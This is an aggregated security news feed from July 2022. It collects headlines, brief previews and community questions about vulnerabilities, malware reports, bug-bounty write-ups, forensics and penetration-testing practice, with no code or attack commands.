    Greetings my fellow exploit developers, I hope you are doing well. As the post title said I am looking someone to do some real world vulnerability research and develop some exploits when we find something. I am having problems with keeping my motivated when I am not finding anything. Which leads to me dropping the project and doing something else which is usually unrelated to exploit dev and vulnerability research. I hope find someone or a small group people who are having similar problems so that we can each other motivated by talking to each everyday. Sharing each others finding and learning something new together. This is my thought process and the reason why I am making this post. So If there is anyone out there thinks something like can help us. Please free to reach out me in DM, Chat or Comment :) Thanks. submitted by /u/CJtheDev [link] [comments]
  • Open

    War in Ukraine / July 27
    Day 155: Above 40 hryvnias per dollar Continue reading on Medium »
  • Open

    Multiple Successful log ins from Internet explorer on my Microsoft account
    Okay so yesterday I went and checked my log in activity since I haven’t checked in about a week and when I looked I noticed that their was a successful log in five days ago from Internet explorer, as well when you expand it to see more info on it I saw that it had multiple times asked for additional verification. Strangely it was all from my own IP address. I have 2fa active so if anyone even tried to log into my account I need to approve it first so I have no idea how internet explorer signed into my account successfully even asking for additional information. As well I checked again this morning and their were two more times IE successfully logged in. I have scanned my computer nothing came up as well I have already changed my password for my account. submitted by /u/Alphem_384 [link] [comments]
    Pentesting
    I need advice on an effective tool for pen testing apps hosted on AWS. submitted by /u/dazkaly [link] [comments]
  • Open

    SecWiki News 2022-07-28 Review
    记一次授权非域环境下的大型内网横向渗透 by 路人甲 FIRST 2022 议题速递 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-28 Review
    记一次授权非域环境下的大型内网横向渗透 by 路人甲 FIRST 2022 议题速递 by Avenger 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 西班牙逮捕了破坏辐射警报系统的黑客;数据泄露成本创历史新高
    数据泄露成本创历史新高。
    从权限角度看滴滴处罚事件
    看看滴滴处罚结果中提到的违规收集用户个人信息的权限,对于日常使用的app可以进行权限自查~
    攻击数量创历史之最 | 《Web3安全季度报告》解读
    CertiK近期发布了《Web3 安全季度报告》(2022年第二季度版),报告描述了Web3网络安全质量的状况。
    离职也逃不掉,Uber协助司法部起诉前CSO
    Uber就2016年一起黑客攻击事件与美国司法部达成不起诉协议,其代价就是,Uber同意帮助美国司法部起诉其前首席安全官Sullivan。
    解读 | 东欧局势正影响全球DDoS攻击态势
    研究发现 DDoS 攻击已被积极用于政治目的。
    IBM数据泄露成本报告发布,数据泄露创历史新高
    IBM发布了最新的数据泄露成本报告。
    新钓鱼平台Robin Banks出现,多国知名金融组织遭针对
    近期出现了一个新型网络钓鱼服务平台,提供现成的网络钓鱼工具包,目标是知名银行和在线服务的客户。
  • Open

    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    No content preview
    How to Install Elastic Stack on Ubuntu 22.04 LTS
    No content preview
  • Open

    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    No content preview
    How to Install Elastic Stack on Ubuntu 22.04 LTS
    No content preview
  • Open

    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    No content preview
    How to Install Elastic Stack on Ubuntu 22.04 LTS
    No content preview

  • Open

    Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925)
    We provide an overview of CVE-2022-26809, CVE-2022-26923 and CVE-2022-26925, along with recommendations for mitigation. The post Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925) appeared first on Unit 42.
  • Open

    AWS Security(S3 buckets, ec2 snapshots, leaked aws keys)
    flaws.cloud challenge Continue reading on Medium »
    HackTheBox | Jerry | Write-up
    Hey Guys, Continue reading on Medium »
    GSuite domain takeover through delegation
    Continue reading on InfoSec Write-ups »
    GSuite domain takeover through delegation
    Continue reading on Medium »
  • Open

    10TB+ of Movies/TVShows, fast connection, couple of NSFW movies.
    submitted by /u/Pukit [link] [comments]
    Daft Club Directory (not fully archived but most links still work)
    submitted by /u/sastofficiallol [link] [comments]
    brewing and distillation guides
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Axiom pictures
    Looking at image in Axiom. There are 97,000 images. 95,000 are windows system or program defaults pictures. I looking for a single picture of contraband. Is there a way to prevent the stock window images from showing up? I’m looking for a setting to prevent seeing all the stock pics. Thanks in advance. submitted by /u/TxProud [link] [comments]
    Incident response and forensic practitioner survey
    I am looking for people with incident response and/or forensics experience to contribute towards an industry survey, designed to help identify ways of optimising service delivery and identify common issues facing IR teams. If you work in an incident response team at any level (junior, senior, or director) and/or conduct forensics following system compromises, please consider responding to my survey. It will only take 5 - 10 minutes, and your support would be greatly appreciated: https://forms.office.com/r/5NtbWAhNWe This is an anonymous survey, but there is the option to leave your email address so that you can stay informed about the results. If you'd prefer not to have your email linked to your submission, please DM me instead. submitted by /u/QoTSankgreall [link] [comments]
    How many drivers are loaded in memory at any given time (rough estimate)?
    I understand that circumstances vary, but what is your rough estimate? Consider a normal user workstation. Thanks, DBR submitted by /u/DeadBirdRugby [link] [comments]
    Software piracy investigation
    Can someone let me know how to forensically identify installation of pirated software? What are the artifacts we should look for? submitted by /u/Pepperknowsitall [link] [comments]
    Are professional organizations worth it?
    Hi, I am wondering if joining a professional organization is worth it. If it is, what are some you recommend for computer forensics and computer engineering (this will be crossposted to both subs)? submitted by /u/swatteam23 [link] [comments]
    ZIP file corrupt/not right format
    I’m currently undergoing a university assignment that requires analysis of a image file and finding evidence to prove of illegal activity. I’ve come across a ZIP file but when extracting it and inspecting it I was met with an error “corrupt/not right format”. I know this file has some important but doesn’t seem to have a standard encryption to it. Is there any methods on inspecting this file further to see if it contains any data or is being masked as a ZIP? (FTK manager wouldn’t open it, neither winrar) submitted by /u/fgtethancx [link] [comments]
  • Open

    AlienVault OSSIM logging?
    So I have OSSIM (but not USM) on a VM and was wondering: The official site says that OSSIM doesn't have log management, but does that mean that it's simply unable to, say, forward logs to a syslog server? Does OSSIM store logs? If so, how can I see how much storage those logs are taking up, and if not, how does OSSIM store its data then? submitted by /u/QueenofCodeNow [link] [comments]
    Help needed: plan of action to grow my tool set in regards to forensics and security
    TL;DR: I'm looking to make a plan of action to gain core knowledge on scripting and operating systems within the context of security. I'm curious to hear your thoughts of what such plan could look like and what home projects/education platforms could help achieve this. Hi all, I recently applied for a forensics job, but failed the assessment (which was expected). I'm CompTIA Net+ & Sec+ certified, but run into problems when I need to do hands on work. It should be noted the job was a medior/senior function, but I decided to give it a shot anyways for the learning experience, which made it extremely valuable. Things I ran into in this particular assignment: basic OS functionality windows & linux: what are the interesting places to start your research and how to securely assess them (processes, bash history, etc.). bash scripting. python scripting. I've done plenty of hack the box, but feel that the guided learning method keeps me from retaining the information. I might have the option to do a funded 10 week full time full stack development course, but that might be overkill and out of scope. I also have a home server which allows me to experiment, I'm just not sure for now how to utilize it for full effect, besides securing the network as good as possible. Thank you for taking the time to read and any advice you might have. submitted by /u/-Column- [link] [comments]
    Simple site Security audit - NoSQL injection, buffer overflow...
    Hi! I'm new to security audit and I have to do it. In college we got task to do about pen-testing the site with: Node.js, Express.js, Pug, MongoDB. This is simple "kitchen blog", you can post your recipes there. (Anticipating the questions, ethical hacking it's no my job, not my field of study. Onlything I want it's help, not making for me anything!) I have already done things like: Password confirmation in register site is wrong, you can set different second password. There is no data encryption beetwen us and server, password is visible (login and registration). Permissions issue due to normal user can delete another user account. NoSQL injection, a few different ways(I don't know if I did it right). User info update issue and small stuf about validation the insert data So after a good research I do not know if I did right the noSQL injection (noSQL it is not common to test I think). Maybe I need confirmation that I did right this. Things I need to test: Buffor overload NoSQL injection Canonical form There is anty tips, videos, articles that you can recommend for that? I have been watching and reading a lot stuff. Of course I'm doing research and I'm fighting with this another day... I think this is unusal post that will make you smile and help :D submitted by /u/puperinoo [link] [comments]
    Vulnerability analysis and information disclosure
    Hello folks, I was tasked to perform vulnerability analysis inside the corporate network and find any useful/disclosed information (public available IPs, shared printers/folders, files with passwords, routers with a default password, open ports, internet exposure services/admin pannels, etc.). Any information that I can find as a threat actor inside the target network. I had never done this before, this is my first task of this type, mostly I work in SOC analyst's stuff (phishing investigation, traffic monitoring, etc.) Could you please suggest any guides/articles/tools/checklists/books for achieving this goal and performing this analysis? I need to create a report with all findings. submitted by /u/TRYH0 [link] [comments]
  • Open

    Creating Sock Puppet Accounts: Everything You Need To Know — Part 3.1
    Hey Folks! I hope you liked part -2 of my OSINT series. Continue reading on Medium »
    War in Ukraine / July 26
    Day 154: The number one goal is the Antonovsky bridge Continue reading on Medium »
  • Open

    Corrupting memory without memory corruption
    submitted by /u/surrealisticpillow12 [link] [comments]
    Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits
    submitted by /u/surrealisticpillow12 [link] [comments]
    Sternum Announces Free Security and Observability Platforms for OpenWrt IoT Devices
    submitted by /u/mesok8 [link] [comments]
    For 12 Hours, Was Part of Apple Engineering’s Network Hijacked by Russia’s Rostelecom?
    submitted by /u/danyork [link] [comments]
    Inside Matanbuchus: A Quirky Loader
    submitted by /u/jat0369 [link] [comments]
  • Open

    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Hello Readers, Continue reading on Medium »
    Trayhackme RootMe Makine Çözümü
    Evreler: Continue reading on Medium »
    GSuite domain takeover through delegation
    Continue reading on Medium »
    MSA Weekly 5 [How to Get Sensitive Data Exposure on Web Application ]
    Data Sensitive Exposure Continue reading on Medium »
    Approaching a Wordpress Site for Bugs :)
    Hi Geeks, This is Aravind here with another blog which may help you in finding bugs on Wordpress sites easily. I have also attached few of… Continue reading on Medium »
    How a Race Condition made these crypto hackers $5000 bug bounty
    Moral of the story — test concurrent requests Continue reading on InfoSec Write-ups »
    ALLIANCEBLOCK TESTNET BUG BOUNTY QUICK GUIDE
    About AllianceBlock Continue reading on Medium »
  • Open

    SecWiki News 2022-07-27 Review
    DeepJIT:用于实时缺陷预测的端到端深度学习框架 by ourren 基于AST变化嵌入的实时缺陷预测 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-27 Review
    DeepJIT:用于实时缺陷预测的端到端深度学习框架 by ourren 基于AST变化嵌入的实时缺陷预测 by ourren 更多最新文章,请访问SecWiki
  • Open

    Microsoft again reverses course, will block macros by default
    submitted by /u/ulriken_ [link] [comments]
  • Open

    Catch from HackTheBox — Detailed Walkthrough
    No content preview
    How a Race Condition made these crypto hackers $5000 bug bounty
    No content preview
  • Open

    Catch from HackTheBox — Detailed Walkthrough
    No content preview
    How a Race Condition made these crypto hackers $5000 bug bounty
    No content preview
  • Open

    Catch from HackTheBox — Detailed Walkthrough
    No content preview
    How a Race Condition made these crypto hackers $5000 bug bounty
    No content preview
  • Open

    FreeBuf早报 | 优步与美国司法部就黑客案达成和解;洛杉矶港口每月遭到四千万次攻击
    优步已与美国司法部就其掩盖 2016 年 11 月的数据泄露事件达成和解,同意起诉其前首席安全官约瑟夫沙利文。
    关于栈迁移的那些事儿
    本篇文章意旨通过原理+例题的形式带领读者一步步理解栈迁移的原理以及在ctf中的应用。
    漏洞披露15分钟内,黑客即可完成漏洞扫描
    一份研究报告显示,攻击者在新 CVE 漏洞公开披露后 15 分钟内,就会扫描到有漏洞的端点。
    恶意应用程序上架谷歌商店,下载竟超1000万次
    来自Dr. Web的防病毒团队在Google Play商店中发现了一批充斥着广告软件和恶意软件的Android应用程序。
    美国大学发布重磅报告,揭露政府持续监视民众的阴谋
    美国乔治敦大学隐私与技术法律中心发布报告,揭露了美国入境和海关执法局建立监控系统,绕过法律近乎全息监控美国公民。
    Lockbit 再次攻击两地公共部门
    近期活动极为频繁的Lockbit勒索软件团伙近日又攻击了两处地方政府的设备。
    斗象科技再次登榜CCSIP 2022中国网络安全产业全景图
    斗象科技入选全景图12大类别,27项细分领域。
    微软:IIS 扩展正越来越多地用作 Exchange 后门
    攻击者正越来越多地使用恶意 Internet 信息服务 (IIS) Web 服务器扩展,对未打补丁的 Exchange 服务器部署后门。
    攻防演练专场精选议题视频上线 | CIS大会夏日版
    ​7月27日,CIS核心论坛——「实网对抗与攻防演练专场」部分议题上线公开课啦!
    在线阅读版:《2022中国软件供应链安全分析报告》全文
    尽管“Log4Shell”漏洞造成了空前的影响,但关键基础开源软件仍然没有引起足够的重视,我们应通过该漏洞事件举一反三,对类似Log4j2这样的关键基础开源软件进行系统化梳理,从基础底座层面进行漏洞排查和加固,针对性采取更强的安全防护措施。
  • Open

    Burp Suite certification: a year in review
    It’s been a year since we launched our Burp Suite Certified Practitioner exam, so we’ve been reflecting on some of the improvements and developments we’ve made across both our preparation materials an
  • Open

    Burp Suite certification: a year in review
    It’s been a year since we launched our Burp Suite Certified Practitioner exam, so we’ve been reflecting on some of the improvements and developments we’ve made across both our preparation materials an
  • Open

    Reflected Cross Site Scripting on User Agent-Dependent Response
    Hello folks, Continue reading on Medium »
  • Open

    HTML Injection via Email Share
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1490311 - Bounty: $500
  • Open

    Rods and Cones, and EDR "blindness"
    I ran across an interesting post recently regarding blinding EDR on Windows systems, which describes four general techniques for avoiding EDR monitoring. Looking at the techniques, I've seen several of these techniques in use on actual, real world incidents. For example, while I was with the Crowdstrike Overwatch team, we observed a threat actor reach out to determine systems with Falcon installed; of the fifteen systems queried, we knew from our records that only four were covered. We lost visibility because the threat actor moved to one of the other eleven systems. I've also seen threat actors "disappear from view" when they've used the Powershell console rather than cmd.exe, or when the threat actor has shell-based/RDP access to systems and uses a GUI-based tool. EDR telemetry includes …

  • Open

    Inbound FW rules for “cybersecurity”?
    I am part of a team that’s standing up a lab network that resides on a corporate DMZ. The lab network will be isolated except for a handful of resources, all outbound. My lab has its own firewall because we want to lock it down. I told the network engineer I wanted all inbound ports blocked and he said he couldn’t do that. At first, he said it’s because of endpoint management software that the LAN users have. I pointed out that our network has a unique use case and was approved to not have endpoint management software loaded on any of the devices. Then he said that cybersecurity needs inbound ports to do their scans. This doesn’t make much sense to me so I pushed back and asked what ports exactly. He did not like that and just said “I’ve been doing this a long time”. Two questions: 1. Shouldn’t “all inbound ports blocked” be an optimal position from a security standpoint? 2. Are there any legitimate inbound ports that should be open for “cybersecurity”? Thanks for helping me learn! submitted by /u/pseudorandom_name [link] [comments]
    Question about Kerberoasting
    Hi, I created a simple lab with 1 VM as Domain Controller (windows 2019) and a few users/computers. I ran setspn -T domain.local and I found several SPns, but just one is in CN=Users, while others are mostly in CN=Computers. If I understand correctly, such SPN (computers, domain controller) aren't useful for Kerberoasting because they generally have very complex password, correct? I mean: Kerberoasting is meant to be a valid attack path only with SPN configured with regular user? thankyou submitted by /u/g-simon [link] [comments]
    Since the connection ID (CID) isn't encrypted in QUIC packets and QUIC allows you to keep existing connections even if your IP changes because it verifies the CID, isn't it easy to spoof a user?
    For example when someone is on the same network as you. submitted by /u/esp32s2 [link] [comments]
  • Open

    10 ways to approach a New Bounty target
    Poke around with the external surface and stuffs like external search and parameters on the outside and not really dive into learning the… Continue reading on Medium »
    Publicly Accessible Android Crash Reports Containing Sensitive Information
    Hello Guys, Continue reading on Medium »
    HTTP Parameter Pollution - It’s Contaminated Again
    Summary : Continue reading on Medium »
    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    Hey 👋 Continue reading on InfoSec Write-ups »
    Sensitive Data Exposure: Inspect Element berujung Inject MongoDB atlas Via Realm
    Sensitive Data Exposure vulnerabilities can occur when a web application does not adequately protect sensitive information from being… Continue reading on Medium »
    Redeemer HackTheBox Challenge Walkthrough
    Redeemer by HakcTheBox is indeed a very good challenge. So in this writeup/walkthrough we are going to see how we can pwn(hack) the… Continue reading on Medium »
  • Open

    Fake Vulnerability, Risk Aversion and You
    Article URL: https://www.residentcontrarian.com/p/fake-vulnerability-risk-aversion Comments URL: https://news.ycombinator.com/item?id=32243828 Points: 2 # Comments: 0
    Log4j Zero-Day Vulnerability: Everything You Need to Know About the Apache Flaw
    Article URL: https://www.spiceworks.com/it-security/vulnerability-management/articles/log4j-apache-vulnerability-everything-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=32235197 Points: 2 # Comments: 1
  • Open

    Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app
    submitted by /u/l_tennant [link] [comments]
    Malicious IIS extensions quietly open persistent backdoors into servers
    submitted by /u/SCI_Rusher [link] [comments]
    Awesome Open-Source Adversary Simulation Tools
    submitted by /u/sciencestudent99 [link] [comments]
    CVE-2022-31813: Forwarding addresses is hard
    submitted by /u/0xdea [link] [comments]
    How to analyze Linux malware – A case study of Symbiote
    submitted by /u/CyberMasterV [link] [comments]
    Zyxel authentication bypass patch analysis (CVE-2022-0342)
    submitted by /u/0xdea [link] [comments]
    Bypass AMSI in local process hooking NtCreateSection
    submitted by /u/gid0rah [link] [comments]
    GitHub - InitRoot/wodat: Windows Oracle Database Attack Toolkit
    submitted by /u/InitRoot [link] [comments]
    US Government Review of the December 2021 Log4j Event
    submitted by /u/ScottContini [link] [comments]
    When Hypervisor Met Snapshot Fuzzing
    submitted by /u/Gallus [link] [comments]
  • Open

    Magnet Axiom Android Mobile Evidence
    Hi, are there other software out there can open/examine/export from the evidence files? Can Encase or Cellebrite PA accomplish this? submitted by /u/hw60068n [link] [comments]
  • Open

    Race condition in faucet when using starport
    Cosmos disclosed a bug submitted by cyberboy: https://hackerone.com/reports/1438052 - Bounty: $5000
  • Open

    Malicious IIS extensions quietly open persistent backdoors into servers
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    War in Ukraine / July 25
    Day 153: A strong South or strong East — is Russia’s dilemma Continue reading on Medium »
    STRATDELA Special Issue #1: Dark Eagle
    In this first Special Issue of my STRATDELA newsletter (https://www.getrevue.co/profile/STRATDELA) Continue reading on Medium »
    OPINION: OSINT, Ethics and Social Media
    Apparently, the internet [the people operating consoles that feed information in the form of human interaction through fiber optic cable]… Continue reading on Medium »
    How to identify your Email Credential Leaked Information
    Continue reading on Medium »
  • Open

    SecWiki News 2022-07-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    No content preview
    You MUST sanitize PHP mail() inputs — or else RCE!
    No content preview
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    No content preview
  • Open

    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    No content preview
    You MUST sanitize PHP mail() inputs — or else RCE!
    No content preview
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    No content preview
  • Open

    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    No content preview
    You MUST sanitize PHP mail() inputs — or else RCE!
    No content preview
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    No content preview
  • Open

    Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
    The Unit 42 Incident Response Report includes insights on which software vulnerabilities are commonly exploited for initial access and a description of how attacker behavior around zero-day vulnerabilities is shifting. The post Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report appeared first on Unit 42.
  • Open

    FreeBuf早报 | 软件问题导致大众 CEO 遭到解雇;UEFI 主板 BIOS 木马发现新变种
    第二季度整个网络安全领域的风险投资下滑至 34 亿美元,季度环比下降近 40%。
    基于开源蜜罐的威胁诱捕 | FreeBuf甲方社群直播回顾
    7月21日,某物联网公司安全专家江鹏(安平不太平)在FreeBuf甲方社群第七期内部直播中担任主讲嘉宾,分享基于开源蜜罐的威胁诱捕。
    网安大国系列 | 美国如何成为网络世界的霸主
    美国发起的众多网络攻击叠加在一起,显示了其背后强大的网络安全力量,逐步走向了网络霸主的宝座。
    FileWave MDM漏洞可能允许威胁行为者入侵上千家企业
    Claroty研究人员在FileWave MDM产品中发现了两个漏洞。
    黑客利用PrestaShop零日漏洞入侵网店
    PrestaShop团队上周五发出紧急警告,有黑客正在针对使用PrestaShop平台的网站。
    Lockbit 勒索软件团伙声称入侵了意大利税务局
    勒索软件团伙 Lockbit 声称已经从意大利税务局窃取了 78GB 的文件。
    Rust编码的信息窃取恶意软件源代码公布,专家警告已被利用
    该恶意软件的开发者称,仅用6个小时就开发完成,相当隐蔽,VirusTotal的检测率约为22%。
    【热点讨论】2022攻防演练情报追踪
    攻防来袭,FreeBuf联合漏洞盒子情报星球为大家送上新鲜及时的情报分享~
    上海启动2022年网络安全产业创新攻关目录成果征集
    上海市经济和信息化委员会组织编制了“2022年上海市网络安全产业创新攻关目录”。

  • Open

    Introduction
    Hello guys my name is caleb jephuneh and welcome to my blog Continue reading on Medium »
    Sensitive Data Exposure: Mengambil alih semua akun, akunmu = akunku.
    Sensitive Data Exposure vulnerabilities can occur when a web application does not adequately protect sensitive information from being… Continue reading on Medium »
    OPEN REDIRECT VULNERABILITIES: ESCALATING TO XSS
    This article was originally published at BePractical Continue reading on Medium »
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    Hi Everyone!, Continue reading on InfoSec Write-ups »
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    Hi Everyone!, Continue reading on Medium »
    DoS worth $650 ? Interesting right!
    Hey Guys, my name is Sagar Sajeev. This is my second writeup and I would like to share how I was rewarded with a bounty of $650 for a… Continue reading on Medium »
    How I Gained Access To A Finance Company’s Accounts (Session Hijacking)
    In a web application security test, I gained access to hundreds of accounts that have belonged to a finance company. The vulnerability… Continue reading on Medium »
    MSA Weekly 5 - “How to Get Sensitive Data Exposure on Web Application”
    Kategori OWASP Continue reading on Medium »
    $1.333 For Account Takeover Via Reset Password
    Assalamualaikum, Halo Bug Hunter! Kali ini gw nemu celah keamanan yang Sangat Critical pada salah satu Aplikasi. Tanpa basa basi, langsung… Continue reading on Medium »
    Open Redirect vulnerability in igp.com
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »
  • Open

    Automate google hacking database by python script.
    In this tutorial we have simple python script which will ask for url and use certain dork to search in google and finally show the result… Continue reading on Medium »
    The importance of educating Security Personnel and Intelligence Analysts about biases
    Bias is a topic that many industries like to avoid, and the security and intelligence industries are no exception. However, there is a… Continue reading on Medium »
    Social Media Investigations and Monitoring for Risk Mitigation Purposes
    The use of social media and the way it affects our lives and businesses have brought a new challenge to the security industry and the… Continue reading on Medium »
    War in Ukraine / July 22–24
    Day 152: The battle for Vuhlehirska Power Station Continue reading on Medium »
    Searching YouTube videos by coordinates
    Youtube needs no introduction — everybody knows what it is. But for us, OSINT enthusiasts, it is much more than just a video platform… Continue reading on Medium »
    OSINT ON SOCIAL MEDIA ACCOUNTS
    USING SHERLOCK TOOL TO CONDUCT OSINT Continue reading on Medium »
  • Open

    Finding Flaws in FileWave MDM
    submitted by /u/derp6996 [link] [comments]
    CosmicStrand: the discovery of a sophisticated UEFI firmware rootkit
    submitted by /u/surrealisticpillow12 [link] [comments]
    Attack Chain Déjà-vu: The infection vector used by SVCReady, Gozi and IcedID
    submitted by /u/OwnPreparation3424 [link] [comments]
    Pulsar — an open-source runtime security framework powered by Rust & eBPF for IoT
    submitted by /u/JDBHub [link] [comments]
    PART 2: How I Met Your Beacon - Cobalt Strike
    submitted by /u/Gallus [link] [comments]
    Multiple vulnerabilities in Nuki smart locks
    submitted by /u/Gallus [link] [comments]
    Since Microsoft patched PPLDump's exploit I'm open sourcing RIPPL, a a tool based off PPLDump which enabled more offensive capabilities against PPL processes like EDRs - @last0x00
    submitted by /u/last0x00 [link] [comments]
  • Open

    Node.js - DLL Hijacking on Windows
    Internet Bug Bounty disclosed a bug submitted by yakirka: https://hackerone.com/reports/1636566 - Bounty: $3000
  • Open

    Tales from the onsite
    This blog will contain all sorts of social engineering shenanigans, mainly from onsite assessments. Continue reading on Medium »
    How I chained multiple CVEs & other vulnerabilities during an RTO to pwn the company remotely
    The exploitation of Pulse VPN application to gain full control on the VPN server and pivot across the cloud infrastructure. Continue reading on Medium »
    How I chained multiple CVEs & other vulnerabilities during an RTO to pwn the company remotely
    The exploitation of Pulse VPN application to gain full control on the VPN server and pivot across the cloud infrastructure. Continue reading on Medium »
    Weaponizing DLL Hijacking with Custom Powershell C2
    Is DLL Hijacking dangerous? How can DLL Hijacked be used in real-life scenario? Hold me keyboard! Continue reading on Medium »
  • Open

    Docker: Creating a Pivoting Lab and Exploiting it
    https://medium.com/p/a66646dc2cf3 submitted by /u/Protection-Mobile [link] [comments]
    Pivoting with Socks and Proxychains
    submitted by /u/Clement_Tino [link] [comments]
    PART 2: How I Met Your Beacon - Cobalt Strike - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-07-25 Review
    PDGraph:针对不安全项目依赖的大规模实证研究 by ourren NeuVector----功能丰富且强大的容器安全开源软件 by ourren 实时缺陷预测工具调研 by ourren 缓冲区溢出漏洞那些事:C -gets函数 by SecIN社区 SecWiki周刊(第438期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-25 Review
    PDGraph:针对不安全项目依赖的大规模实证研究 by ourren NeuVector----功能丰富且强大的容器安全开源软件 by ourren 实时缺陷预测工具调研 by ourren 缓冲区溢出漏洞那些事:C -gets函数 by SecIN社区 SecWiki周刊(第438期) by ourren 更多最新文章,请访问SecWiki
  • Open

    IAM-Deescalate: An Open Source Tool to Help Users Reduce the Risk of Privilege Escalation
    We developed an open source tool, IAM-Deescalate, to help mitigate the privilege escalation risks of overly permissive identities in AWS. The post IAM-Deescalate: An Open Source Tool to Help Users Reduce the Risk of Privilege Escalation appeared first on Unit 42.
  • Open

    Imaging the impossible? A Samsung Galaxy Book Go
    Hi all! I have a samsung galaxy book go (np340xla) that so far feels impossible to image and I was wondering if anyone had any suggestions. This is what I have tried so far: Remove the disk: Can't, it's soldered on Boot from Paladin/Kali/Ubuntu/Mint: USB won't appear as an option Secure boot is already disabled (was never enabled) BIOS is the most minimal bios I have ever seen UEFI option from BIOS? non existant Cant boot from anything else than the windows boot manager or an option called "USB: hard disk" (it goes back to the disk) I have used USB-C, USB-3, USB-2, powered USB hub I have tried the Linux distros in both UEFI and I can reach the "recovery" option from Windows, but that won't get me anywhere than deleting the disk. Any other ideas? At this point, I will accept ANYTHING as long as I can image this laptop. Just in case it is asked: I don't have the pin (: submitted by /u/agente_99 [link] [comments]
    Best site for memory forensic test
    Hi. there are plenty of sites that test you in network forensics that provide you with a pcap file to analyze and ask you questions to answer. Are there any sites like that for memory forensics that you like? submitted by /u/antmar9041 [link] [comments]
  • Open

    FreeBuf早报 | 数字人民币可满足个人匿名支付需求;谷歌开除称机器人有知觉的工程师
    工程师坚称谷歌的 LaMDA 聊天机器人具有感知能力,谷歌以违反危害商业机密的“就业和数据安全政策”为由将其解雇。
    IDC网络威胁检测与响应市场报告,斗象科技增速领跑
    斗象科技入选IDC报告,斗象PRS-NTA产品市场增速亮眼
    QBot通过DLL侧载方式感染设备
    Windows7的DLL侧载缺陷近期被QBot恶意软件利用。
    借助SmokeLoader恶意软件分发,Amadey重出江湖
    新版本的Amadey Bot恶意软件使用软件破解和注册机站点作为诱饵,正通过SmokeLoader恶意软件分发。
    黑客正以3万美元价格出售 540万个Twitter帐户数据
    黑客表示这些数据涵盖了一些知名人士、公司机构以及随机的普通用户的账户信息。
    数字安全巨头 Entrust 遭遇勒索攻击
    数字安全巨头Entrust已经承认,自己遭受了网络攻击,攻击者破坏了其内部网络,并窃取了一定规模的数据。
  • Open

    This is why you should ALWAYS check for Race Conditions (even in JavaScript)
    No content preview
  • Open

    This is why you should ALWAYS check for Race Conditions (even in JavaScript)
    No content preview
  • Open

    This is why you should ALWAYS check for Race Conditions (even in JavaScript)
    No content preview
  • Open

    Differentiate three types of eBPF redirections (2022)
    TL; DR There are three types of eBPF redirection fashions in Linux kernel that may confuse developers often: bpf_redirect_peer() bpf_redirect_neighbor() bpf_redirect() This post helps to clarify them by digging into the code in history order, and also discusses usages & related problems in real world. TL; DR 1 The foundation: bpf_redirect(), 2015 1.1 The documentation Description Comparison with bpf_clone_redirect() 1.2 Kernel implementations/changes 1. Add TC action type TC_ACT_REDIRECT 2. Add new BPF helper & syscall 3. Process redirect logic in TC BPF 1.3 Call stack 2 Egress optimization: bpf_redirect_neighbor(), 2020 2.1 Comparison with bpf_redirect() 2.2 Kernel implementations/changes 1. Modify skb_do_redirect(), prefer the new one whenever available 2.…

  • Open

    TryHackMe — NahamStore Part 1 | XSS (Tasks 3&4) —  (Medium)
    Hello again and welcome to another one of my CTF write-up attempts. Since I have recently been trying to step up my web app pentesting… Continue reading on Medium »
  • Open

    Analyzing raw image
    This may seem like a stupid question but I’ve been trying to figure this out all day and I haven’t had a clue. Im using PowerShell to open Volatility and I want to analyze a raw image I have saved on my downloads folder on my Windows computer. How can I tell volatility via PowerShell to open that image? submitted by /u/1rangusN1dangus [link] [comments]
  • Open

    ProtectMyTooling – Don’t detect tools, detect techniques – mgeeky's lair
    submitted by /u/dmchell [link] [comments]
  • Open

    3 things to do if you want to be a penetration tester
    Now that I would consider myself to no longer be a beginner penetration tester, I feel like it is a great time to reflect on my personal… Continue reading on Medium »
    start hacking carrier part 4 | create a custom word list for you target …
    is a pain follow these steps to create custom word list for your target if you are new in bug bounty and you want to learn from scratch… Continue reading on Medium »
    ONERARE TESTNET QUICK GUIDE 70,000 $ORARE AS REWARD
    OneRare is creating the world’s first Foodverse for the Global Food Industry. Our first launch is the Gaming Zone, celebrating Dishes from… Continue reading on Medium »
    Privilage Escalation
    Assalam O Alaikum. Alhamdullillah! Continue reading on Medium »
